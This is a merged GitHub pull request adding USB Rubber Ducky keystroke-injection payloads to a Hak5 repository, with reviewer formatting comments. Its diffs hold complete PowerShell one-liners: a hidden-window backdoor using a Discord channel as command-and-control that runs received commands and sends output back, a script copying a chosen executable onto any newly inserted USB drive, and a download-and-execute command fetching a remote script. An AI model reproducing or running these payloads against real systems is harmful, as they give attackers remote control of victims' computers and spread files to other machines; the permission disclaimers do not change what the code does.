### PR TITLE
beigeworm's first hak5 payload submission!

### PR DESCRIPTION
**Pull request by beigeworm**
I have added 3 payloads to [usbrubberducky-payloads](https://github.com/hak5/usbrubberducky-payloads) :

**Payloads**
- Discord-CLI : Gain a reverse shell on a target Windows PC using Discord's bot API as a command and control server.
- Global-Powershell-Logging : Log all powershell input and output to a text file in `Documents/WindowsPowershell` folder.
- USB-Poison : Copy a file or payload to any newly connected USB drives.

**Requirements**
- Discord-CLI : A Discord bot/app token, A discord server and channel setup.
- Global-Powershell-Logging : Administrator permissions are required for this script.
- USB-Poison : A specified file to copy.

*All payloads are tested and working on both Windows 10 and 11 (pro editions)*

### CODE REVIEW

File: payloads/library/general/USB-Poison/USB-Poison.txt [hunk 1]
```diff
@@ -0,0 +1,18 @@
+REM Author:      beigeworm 
+REM Title:       USB-Poison
+REM Target:      Windows 10/11 
+REM Description: This script waits for new USB flash storage devices to be connected.
+REM Description: When a new device connects, this script will copy a desired file to the root of newly connected drive.
+
+REM **THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE!**
+
+REM Define the local path to your file to copy.
+DEFINE FILEPATH path/to/your/file.exe
```
Comment (hak5peaks) [inline payloads/library/general/USB-Poison/USB-Poison.txt:10]: Similar too your other payload. You need to modify this and add a `#` to the `DEFINE` 

```
DEFINE #FILEPATH path/to/your/file.exe
```

File: payloads/library/general/USB-Poison/USB-Poison.txt [hunk 2]
```diff
@@ -0,0 +1,18 @@
...
+REM Define the local path to your file to copy.
+DEFINE FILEPATH path/to/your/file.exe
+
+REM Main bad-USB script 
+DELAY 1000
+GUI r
+DELAY 500
+STRINGLN powershell -Ep Bypass -W H
+DELAY 3000
+STRINGLN $file="FILEPATH";while($true){$initialDrives=Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | select DeviceID;while($true){$currentDrives=Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | select DeviceID;$newDrive=$currentDrives | Where-Object { $initialDrives.DeviceID -notcontains $_.DeviceID};if($newDrive){$drive=Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | Where-Object {$initialDrives.DeviceID -notcontains $_.DeviceID};$driveletter=($drive.DeviceID + '/');Copy-Item -Path $file -Destination $driveletter;sleep 1;break}sleep 1}}
```
Comment (hak5peaks) [inline payloads/library/general/USB-Poison/USB-Poison.txt:18]: As stated in other comment, please add a `#` before `FILEPATH`

```
STRINGLN $file="#FILEPATH"
```

File: payloads/library/general/USB-Poison/USB-Poison-Hidden.txt [hunk 3]
```diff
@@ -0,0 +1,18 @@
+REM Author:      beigeworm 
+REM Title:       USB-Poison
+REM Target:      Windows 10/11
```
Comment (hak5peaks) [inline payloads/library/general/USB-Poison/USB-Poison-Hidden.txt:3]: Consider using `EXTENSION PASSIVE_WINDOWS_DETECT` the extension allows for the USB rubber ducky to dynamically detect when the target is accepting keystroke removing the need for a long start delay. Also allows you to add a guard statement to ensure the target is windows 

for example 

```                                                                                                                                                   
IF ($_OS != WINDOWS)                                                                                                                 
    LED_R                                                                                                                                       
    STOP_PAYLOAD 
END_IF
```

File: payloads/library/incident_response/Global-Powershell-Logging/Payload.txt [hunk 4]
```diff
@@ -0,0 +1,16 @@
+REM Author:      beigeworm 
+REM Title:       Global-Powershell-Logging
+REM Target:      Windows 10/11
```
Comment (hak5peaks) [inline payloads/library/incident_response/Global-Powershell-Logging/Payload.txt:3]: Consider using `EXTENSION PASSIVE_WINDOWS_DETECT` the extension allows for the USB rubber ducky to dynamically detect when the target is accepting keystroke removing the need for a long start delay. Also allows you to add a guard statement to ensure the target is windows 

for example 

```                                                                                                                                                   
IF ($_OS != WINDOWS)                                                                                                                 
    LED_R                                                                                                                                       
    STOP_PAYLOAD 
END_IF
```

File: payloads/library/incident_response/Global-Powershell-Logging/Payload.txt [hunk 5]
```diff
@@ -0,0 +1,16 @@
...
+REM Target:      Windows 10/11 
+REM Description: Log all powershell input and output to a text file in the documents folder.
+
+REM **THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE!**
+
+REM Main bad-USB script
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -Ep Bypass -W H -C IRM https://yourserver.com/rawfile/Global-Powershell-Logging.ps1 | iex
```
Comment (hak5peaks) [inline payloads/library/incident_response/Global-Powershell-Logging/Payload.txt:12]: Please use a `DEFINE` for server link. This makes configuration easier for the user and makes the script more readable. 

```
DEFINE #SERVERURL  https://example.com/

STRING powershell -Ep Bypass -W H -C IRM #SERVERURL | iex
```

I would also specify inside of your reamde.md that is payload downloading the ps1 file from a server and also explain that the user will need to host the file on their server

File: payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt [hunk 6]
```diff
@@ -0,0 +1,18 @@
+REM Author:      beigeworm 
+REM Title:       Discord-CLI
+REM Target:      Windows 10/11 
+REM Description: Gain a reverse shell on a target Windows PC using Discord's bot API as a command and control server.
+
+REM **THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE!**
+
+REM Define the Discord bot token and channel ID
+DEFINE TOKEN your-bot-token-here
```
Comment (hak5peaks) [inline payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt:9]: Similar you to your other payloads, you need to you a `#` to your defines and calls

```
DEFINE #TOKEN your-bot-token-here
DEFINE #CHANNEL your-channel-id-here

STRINGLN $t = "#TOKEN";$c = "#CHANNEL"
```

File: payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt [hunk 7]
```diff
@@ -0,0 +1,18 @@
+REM Author:      beigeworm 
+REM Title:       Discord-CLI
+REM Target:      Windows 10/11
```
Comment (hak5peaks) [inline payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt:3]: Consider using `EXTENSION PASSIVE_WINDOWS_DETECT` the extension allows for the USB rubber ducky to dynamically detect when the target is accepting keystroke removing the need for a long start delay. Also allows you to add a guard statement to ensure the target is windows 

for example 

```                                                                                                                                                   
IF ($_OS != WINDOWS)                                                                                                                 
    LED_R                                                                                                                                       
    STOP_PAYLOAD 
END_IF
```

File: payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt [hunk 8]
```diff
@@ -0,0 +1,18 @@
...
+DELAY 3000
+STRINGLN $t = "TOKEN";$c = "CHANNEL";$a='[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);';$t=Add-Type -M $a -name Win32ShowWindowAsync -names Win32Functions -pas;$h=(Get-Process -PID $pid).MainWindowHandle;if($h -ne [System.IntPtr]::Zero){$t::ShowWindowAsync($h,0)}else{$Host.UI.RawUI.WindowTitle='hideme';$n=(Get-Process | Where-Object{$_.MainWindowTitle -eq 'hideme'});$h=$n.MainWindowHandle;$t::ShowWindowAsync($h,0)};function sndmsg{$w.Headers.Add("Content-Type", "application/json");$j = @{"content" = "``````$($b -join "`n")``````"} | ConvertTo-Json;$x = $w.UploadString($u, "POST", $j)}while($true){$u = "https://discord.com/api/v10/channels/$c/messages";$w = New-Object System.Net.WebClient;$w.Headers.Add("Authorization", "Bot $t");$m = $w.DownloadString($u);$r = ($m | ConvertFrom-Json)[0];if(-not $r.author.bot){$a = $r.timestamp;$m = $r.content}if($a -ne $p){$p = $a;$o = ie`x $m;$l = $o -split "`n";$s = 0;$b = @();foreach($z in $l){$y = [System.Text.Encoding]::Unicode.GetByteCount($z);if(($s + $y) -gt 1900){sndmsg;sleep 1;$s = 0;$b = @()}$b += $z;$s += $y}if($b.Count -gt 0){sndmsg}}Sleep 3}
```
Comment (hak5peaks) [inline payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt:18]: As mentioned above, add a `#` to your definition calls 

```
STRINGLN $t = "#TOKEN";$c = "#CHANNEL"
```

File: payloads/library/remote_access/Discord-CLI/Discord-CLI.txt [hunk 9]
```diff
@@ -0,0 +1,18 @@
+REM Author:      beigeworm 
+REM Title:       Discord-CLI
+REM Target:      Windows 10/11 
+REM Description: Gain a reverse shell on a target Windows PC using Discord's bot API as a command and control server.
+
+REM **THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE!**
+
+REM Define the Discord bot token and channel ID
+DEFINE TOKEN your-bot-token-here
```
Comment (hak5peaks) [inline payloads/library/remote_access/Discord-CLI/Discord-CLI.txt:9]: Similar you to your other payloads, you need to you a `#` to your defines and calls

```
DEFINE #TOKEN your-bot-token-here
DEFINE #CHANNEL your-channel-id-here

STRINGLN $t = "#TOKEN";$c = "#CHANNEL"
```

File: payloads/library/remote_access/Discord-CLI/Discord-CLI.txt [hunk 10]
```diff
@@ -0,0 +1,18 @@
...
+DEFINE CHANNEL your-channel-id-here
+
+REM Main bad-USB script 
+DELAY 1000
+GUI r
+DELAY 500
+STRINGLN powershell -Ep Bypass -W H
+DELAY 3000
+STRINGLN $t = "TOKEN";$c = "CHANNEL";function sndmsg{$w.Headers.Add("Content-Type", "application/json");$j = @{"content" = "``````$($b -join "`n")``````"} | ConvertTo-Json;$x = $w.UploadString($u, "POST", $j)}while($true){$u = "https://discord.com/api/v10/channels/$c/messages";$w = New-Object System.Net.WebClient;$w.Headers.Add("Authorization", "Bot $t");$m = $w.DownloadString($u);$r = ($m | ConvertFrom-Json)[0];if(-not $r.author.bot){$a = $r.timestamp;$m = $r.content}if($a -ne $p){$p = $a;$o = ie`x $m;$l = $o -split "`n";$s = 0;$b = @();foreach($z in $l){$y = [System.Text.Encoding]::Unicode.GetByteCount($z);if(($s + $y) -gt 1900){sndmsg;sleep 1;$s = 0;$b = @()}$b += $z;$s += $y}if($b.Count -gt 0){sndmsg}}Sleep 3}
```
Comment (hak5peaks) [inline payloads/library/remote_access/Discord-CLI/Discord-CLI.txt:18]: As mentioned above, add a `#` to your definition calls 

```
STRINGLN $t = "#TOKEN";$c = "#CHANNEL"
```

**Review by hak5peaks — CHANGES_REQUESTED** [review]

File: payloads/library/general/USB-Poison/USB-Poison-Hidden.txt [hunk 11]
```diff
@@ -0,0 +1,18 @@
+REM Author:      beigeworm 
+REM Title:       USB-Poison
+REM Target:      Windows 10/11 
+REM Description: This script waits for new USB flash storage devices to be connected.
+REM Description: When a new device connects, this script will copy a desired file to the root of newly connected drive.
+
+REM **THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE!**
+
+REM Define the local path to your file to copy.
+DEFINE FILEPATH path/to/your/file.exe
```
[the remark this answers is not in the document]
Comment (beigeworm) [reply payloads/library/general/USB-Poison/USB-Poison-Hidden.txt]: Thanks peaks I have made the requested amendments :)

File: payloads/library/general/USB-Poison/USB-Poison-Hidden.txt [hunk 12]
```diff
@@ -0,0 +1,18 @@
...
+
+REM Main bad-USB script 
+DELAY 1000
+GUI r
+DELAY 500
+STRINGLN powershell -Ep Bypass -W H
+DELAY 3000
+STRINGLN $file="FILEPATH";$a='[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);';$t=Add-Type -M $a -name Win32ShowWindowAsync -names Win32Functions -pas;$h=(Get-Process -PID $pid).MainWindowHandle;if($h -ne [System.IntPtr]::Zero){$t::ShowWindowAsync($h,0)}else{$Host.UI.RawUI.WindowTitle='hideme';$n=(Get-Process | Where-Object{$_.MainWindowTitle -eq 'hideme'});$h=$n.MainWindowHandle;$t::ShowWindowAsync($h,0)};while($true){$initialDrives=Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | select DeviceID;while($true){$currentDrives=Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | select DeviceID;$newDrive=$currentDrives | Where-Object { $initialDrives.DeviceID -notcontains $_.DeviceID};if($newDrive){$drive=Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | Where-Object {$initialDrives.DeviceID -notcontains $_.DeviceID};$driveletter=($drive.DeviceID + '/');Copy-Item -Path $file -Destination $driveletter;sleep 1;break}sleep 1}}
```
[the remark this answers is not in the document]
Comment (beigeworm) [reply payloads/library/general/USB-Poison/USB-Poison-Hidden.txt]: Thanks peaks I have made the requested amendments :)

File: payloads/library/general/USB-Poison/USB-Poison.txt (hunk 1 above)
Comment (beigeworm) [reply payloads/library/general/USB-Poison/USB-Poison.txt]: Thanks peaks I have made the requested amendments :)

File: payloads/library/general/USB-Poison/USB-Poison.txt (hunk 2 above)
Comment (beigeworm) [reply payloads/library/general/USB-Poison/USB-Poison.txt]: Thanks peaks I have made the requested amendments :)

File: payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt (hunk 6 above)
Comment (beigeworm) [reply payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt]: Thanks peaks I have made the requested amendments :)

File: payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt (hunk 7 above)
Comment (beigeworm) [reply payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt:3]: Thanks peaks I have made the requested amendments :)

Comment (beigeworm) [reply payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt:3]: Thanks peaks I have made the requested amendments :)

File: payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt (hunk 8 above)
Comment (beigeworm) [reply payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt]: Thanks peaks I have made the requested amendments :)

File: payloads/library/remote_access/Discord-CLI/Discord-CLI.txt (hunk 9 above)
Comment (beigeworm) [reply payloads/library/remote_access/Discord-CLI/Discord-CLI.txt]: Thanks peaks I have made the requested amendments :)

File: payloads/library/remote_access/Discord-CLI/Discord-CLI.txt (hunk 10 above)
Comment (beigeworm) [reply payloads/library/remote_access/Discord-CLI/Discord-CLI.txt]: Thanks peaks I have made the requested amendments :)

File: payloads/library/incident_response/Global-Powershell-Logging/Payload.txt (hunk 4 above)
Comment (beigeworm) [reply payloads/library/incident_response/Global-Powershell-Logging/Payload.txt:3]: Thanks peaks I have made the requested amendments :)

File: payloads/library/incident_response/Global-Powershell-Logging/Payload.txt (hunk 5 above)
Comment (beigeworm) [reply payloads/library/incident_response/Global-Powershell-Logging/Payload.txt]: Thanks peaks I have made the requested amendments :)

**Comment by beigeworm** [comment]
Hoping all changes meet the requirements - Thanks!

**Review by hak5peaks — CHANGES_REQUESTED** [review]

File: payloads/library/incident_response/Global-Powershell-Logging/README.md
[the remark this answers is not in the document]
Comment (beigeworm) [reply payloads/library/incident_response/Global-Powershell-Logging/README.md:1]: All done! :)

**Pull request merged**